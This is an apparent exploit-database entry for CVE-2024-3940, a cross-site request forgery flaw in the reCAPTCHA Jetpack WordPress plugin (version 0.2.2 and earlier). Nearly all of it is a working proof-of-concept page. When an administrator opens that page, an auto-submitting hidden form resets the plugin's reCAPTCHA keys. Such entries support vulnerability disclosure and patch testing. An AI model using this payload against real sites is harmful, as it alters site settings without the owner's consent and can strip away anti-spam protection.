Exploit for reCAPTCHA Jetpack <= 0.2.2 - Settings Update via CSRF CVE-2024-3940

Name: Exploit for reCAPTCHA Jetpack <= 0.2.2 - Settings Update via CSRF CVE-2024-3940
Rating: 5 (72 reviews)

2024-04-19 | CVSS 6.7

## https://sploitus.com/exploit?id=WPEX-ID:BB0245E5-8E94-4F11-9003-D6208945056C
Have an admin open an HTML page containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
        <input type="hidden" name="site_key" value="" />
        <input type="hidden" name="secret_key" value="" />
        <input type="hidden" name="recaptcha_type" value="v2" />
        <input type="hidden" name="reset" value="Reset to Defaults" />
        <input type="submit" name="enter" id="enter" value="Submit">
    </form>
</body>
```